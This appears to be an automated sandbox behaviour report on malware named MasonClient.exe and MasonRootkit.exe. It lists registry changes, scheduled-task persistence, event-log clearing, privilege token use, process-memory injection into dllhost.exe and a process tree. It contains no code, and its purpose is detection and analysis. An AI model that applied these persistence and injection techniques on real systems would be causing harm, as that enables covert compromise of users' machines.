Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8e9975d-01b6-4949- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89e00412-11f9-4268-	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21f05d18-b523-410a-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21f05d18-b523-410a-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bcfb66-e4f8-4ead- = "\\\\?\\Volume{241EF5C9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\d80b6d68d740ac2196577a2707c7993dab7ee89af97616ea3ed277206f3c72d0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7df04202-a482-4619- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7e8d2f7e-81a9-4eb4-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8ee8df12-3c32-46df- = "\\\\?\\Volume{241EF5C9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\38991bd3a4e096eddf2da41d645b9dfac1d969ee85d9be990448b6d60916dfd2"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89e00412-11f9-4268-	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\89e00412-11f9-4268- = "8324"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d15e0305-a26a-4ee4-	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\99d2a197-4a08-48d8- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\85372c46-68d3-4a63-	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\85372c46-68d3-4a63- = b191d857698ddb01	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7e8d2f7e-81a9-4eb4- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bcfb66-e4f8-4ead- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e2dc9a56698ddb01e2dc9a56698ddb01e2dc9a56698ddb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000655afa062000643830623664363864373430616332313936353737613237303763373939336461623765653839616639373631366561336564323737323036663363373264300000b20009000400efbe655afa06655afa062e000000000000000000000000000000000000000000000000001e3f1801640038003000620036006400360038006400370034003000610063003200310039003600350037003700610032003700300037006300370039003900330064006100620037006500650038003900610066003900370036003100360065006100330065006400320037003700320030003600660033006300370032006400300000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000374c46771000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64383062366436386437343061633231393635373761323730376337393933646162376565383961663937363136656133656432373732303666336337326430000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000676f69676e77656a0000000000000000c85995649be9304fa5992dfa6fd26d66e983aaef44edef11ad466a30fd81d1a6c85995649be9304fa5992dfa6fd26d66e983aaef44edef11ad466a30fd81d1a6ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100370030003600300034003200330039002d003800350030003800360030003700350037002d0033003100310032003000300035003700310035002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000c9f51e24000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1170604239-850860757-3112005715-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21f05d18-b523-410a- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2996	schtasks.exe
8452	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2056	powershell.exe
2056	powershell.exe
1040	MasonRootkit.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe
3812	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3332	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3196	MasonClient.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	1040	MasonRootkit.exe
Token: SeDebugPrivilege	1040	MasonRootkit.exe
Token: SeDebugPrivilege	3812	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	1824	svchost.exe
Token: SeIncreaseQuotaPrivilege	1824	svchost.exe
Token: SeSecurityPrivilege	1824	svchost.exe
Token: SeTakeOwnershipPrivilege	1824	svchost.exe
Token: SeLoadDriverPrivilege	1824	svchost.exe
Token: SeSystemtimePrivilege	1824	svchost.exe
Token: SeBackupPrivilege	1824	svchost.exe
Token: SeRestorePrivilege	1824	svchost.exe
Token: SeShutdownPrivilege	1824	svchost.exe
Token: SeSystemEnvironmentPrivilege	1824	svchost.exe
Token: SeUndockPrivilege	1824	svchost.exe
Token: SeManageVolumePrivilege	1824	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1824	svchost.exe
Token: SeIncreaseQuotaPrivilege	1824	svchost.exe
Token: SeSecurityPrivilege	1824	svchost.exe
Token: SeTakeOwnershipPrivilege	1824	svchost.exe
Token: SeLoadDriverPrivilege	1824	svchost.exe
Token: SeSystemtimePrivilege	1824	svchost.exe
Token: SeBackupPrivilege	1824	svchost.exe
Token: SeRestorePrivilege	1824	svchost.exe
Token: SeShutdownPrivilege	1824	svchost.exe
Token: SeSystemEnvironmentPrivilege	1824	svchost.exe
Token: SeUndockPrivilege	1824	svchost.exe
Token: SeManageVolumePrivilege	1824	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1824	svchost.exe
Token: SeIncreaseQuotaPrivilege	1824	svchost.exe
Token: SeSecurityPrivilege	1824	svchost.exe
Token: SeTakeOwnershipPrivilege	1824	svchost.exe
Token: SeLoadDriverPrivilege	1824	svchost.exe
Token: SeSystemtimePrivilege	1824	svchost.exe
Token: SeBackupPrivilege	1824	svchost.exe
Token: SeRestorePrivilege	1824	svchost.exe
Token: SeShutdownPrivilege	1824	svchost.exe
Token: SeSystemEnvironmentPrivilege	1824	svchost.exe
Token: SeUndockPrivilege	1824	svchost.exe
Token: SeManageVolumePrivilege	1824	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1824	svchost.exe
Token: SeIncreaseQuotaPrivilege	1824	svchost.exe
Token: SeSecurityPrivilege	1824	svchost.exe
Token: SeTakeOwnershipPrivilege	1824	svchost.exe
Token: SeLoadDriverPrivilege	1824	svchost.exe
Token: SeSystemtimePrivilege	1824	svchost.exe
Token: SeBackupPrivilege	1824	svchost.exe
Token: SeRestorePrivilege	1824	svchost.exe
Token: SeShutdownPrivilege	1824	svchost.exe
Token: SeSystemEnvironmentPrivilege	1824	svchost.exe
Token: SeUndockPrivilege	1824	svchost.exe
Token: SeManageVolumePrivilege	1824	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1824	svchost.exe
Token: SeIncreaseQuotaPrivilege	1824	svchost.exe
Token: SeSecurityPrivilege	1824	svchost.exe
Token: SeTakeOwnershipPrivilege	1824	svchost.exe
Token: SeLoadDriverPrivilege	1824	svchost.exe
Token: SeSystemtimePrivilege	1824	svchost.exe
Token: SeBackupPrivilege	1824	svchost.exe
Token: SeRestorePrivilege	1824	svchost.exe
Token: SeShutdownPrivilege	1824	svchost.exe
Token: SeSystemEnvironmentPrivilege	1824	svchost.exe
Token: SeUndockPrivilege	1824	svchost.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
3196	MasonClient.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe
5404	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3332	Explorer.EXE

Suspicious use of UnmapMainImage 4 IoCs

pid	Process
3888	RuntimeBroker.exe
3332	Explorer.EXE
2928	RuntimeBroker.exe
3312	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3196 wrote to memory of 2056	3196	MasonClient.exe	87
PID 3196 wrote to memory of 2056	3196	MasonClient.exe	87
PID 2056 wrote to memory of 4980	2056	powershell.exe	93
PID 2056 wrote to memory of 4980	2056	powershell.exe	93
PID 3196 wrote to memory of 2996	3196	MasonClient.exe	94
PID 3196 wrote to memory of 2996	3196	MasonClient.exe	94
PID 4980 wrote to memory of 1040	4980	MasonRootkit.exe	97
PID 4980 wrote to memory of 1040	4980	MasonRootkit.exe	97
PID 4980 wrote to memory of 4824	4980	MasonRootkit.exe	98
PID 4980 wrote to memory of 4824	4980	MasonRootkit.exe	98
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 1040 wrote to memory of 3812	1040	MasonRootkit.exe	100
PID 4824 wrote to memory of 4532	4824	cmd.exe	101
PID 4824 wrote to memory of 4532	4824	cmd.exe	101
PID 3812 wrote to memory of 600	3812	dllhost.exe	5
PID 3812 wrote to memory of 676	3812	dllhost.exe	7
PID 3812 wrote to memory of 952	3812	dllhost.exe	12
PID 3812 wrote to memory of 316	3812	dllhost.exe	13
PID 3812 wrote to memory of 736	3812	dllhost.exe	14
PID 3812 wrote to memory of 1028	3812	dllhost.exe	15
PID 3812 wrote to memory of 1052	3812	dllhost.exe	17
PID 3812 wrote to memory of 1108	3812	dllhost.exe	18
PID 3812 wrote to memory of 1220	3812	dllhost.exe	19
PID 3812 wrote to memory of 1236	3812	dllhost.exe	20
PID 3812 wrote to memory of 1308	3812	dllhost.exe	21
PID 3812 wrote to memory of 1332	3812	dllhost.exe	22
PID 3812 wrote to memory of 1352	3812	dllhost.exe	23
PID 3812 wrote to memory of 1384	3812	dllhost.exe	24
PID 3812 wrote to memory of 1400	3812	dllhost.exe	25
PID 3812 wrote to memory of 1432	3812	dllhost.exe	26
PID 3812 wrote to memory of 1600	3812	dllhost.exe	27
PID 3812 wrote to memory of 1616	3812	dllhost.exe	28
PID 3812 wrote to memory of 1720	3812	dllhost.exe	29
PID 3812 wrote to memory of 1732	3812	dllhost.exe	30
PID 3812 wrote to memory of 1800	3812	dllhost.exe	31
PID 3812 wrote to memory of 1884	3812	dllhost.exe	32
PID 3812 wrote to memory of 2024	3812	dllhost.exe	33
PID 3812 wrote to memory of 2036	3812	dllhost.exe	34
PID 3812 wrote to memory of 1776	3812	dllhost.exe	35
PID 3812 wrote to memory of 1824	3812	dllhost.exe	36
PID 3812 wrote to memory of 2060	3812	dllhost.exe	37
PID 3812 wrote to memory of 2156	3812	dllhost.exe	38
PID 3812 wrote to memory of 2236	3812	dllhost.exe	40
PID 676 wrote to memory of 1936	676	lsass.exe	92
PID 676 wrote to memory of 2236	676	lsass.exe	40
PID 3812 wrote to memory of 2328	3812	dllhost.exe	41
PID 3812 wrote to memory of 2520	3812	dllhost.exe	42
PID 3812 wrote to memory of 2528	3812	dllhost.exe	43
PID 3812 wrote to memory of 2660	3812	dllhost.exe	44
PID 3812 wrote to memory of 2676	3812	dllhost.exe	45
PID 3812 wrote to memory of 2752	3812	dllhost.exe	46
PID 3812 wrote to memory of 2780	3812	dllhost.exe	47
PID 3812 wrote to memory of 2800	3812	dllhost.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:600
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:316
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2c26e5e8-87ed-4f1a-a30e-b128a32e3393}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3812
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:10912
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:13916
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:10424
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:10120
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:13012
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:12052
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:10908
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:5536
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:1444
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:10832
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:5996
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2220
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:9916
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:12540
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:10584
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:9948

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1236
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2780
- C:\Users\Admin\AppData\Roaming\MasonClient.exe
  C:\Users\Admin\AppData\Roaming\MasonClient.exe
  2⤵
  - Executes dropped EXE
  PID:5324
- C:\Users\Admin\AppData\Roaming\MasonClient.exe
  C:\Users\Admin\AppData\Roaming\MasonClient.exe
  2⤵
  - Executes dropped EXE
  PID:4484
- C:\Users\Admin\AppData\Roaming\MasonClient.exe
  C:\Users\Admin\AppData\Roaming\MasonClient.exe
  2⤵
  PID:6200
- C:\Users\Admin\AppData\Roaming\MasonClient.exe
  C:\Users\Admin\AppData\Roaming\MasonClient.exe
  2⤵
  PID:12160
- C:\Users\Admin\AppData\Roaming\MasonClient.exe
  C:\Users\Admin\AppData\Roaming\MasonClient.exe
  2⤵
  PID:11220
- C:\Users\Admin\AppData\Roaming\MasonClient.exe
  C:\Users\Admin\AppData\Roaming\MasonClient.exe
  2⤵
  PID:4528
- C:\Users\Admin\AppData\Roaming\MasonClient.exe
  C:\Users\Admin\AppData\Roaming\MasonClient.exe
  2⤵
  PID:9232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1384

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1600
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1884
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x498 0x2f4
  2⤵
  PID:13352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2060

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2156

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2876

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2972

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:784

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3332
- C:\Users\Admin\AppData\Local\Temp\MasonClient.exe
  "C:\Users\Admin\AppData\Local\Temp\MasonClient.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:3196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
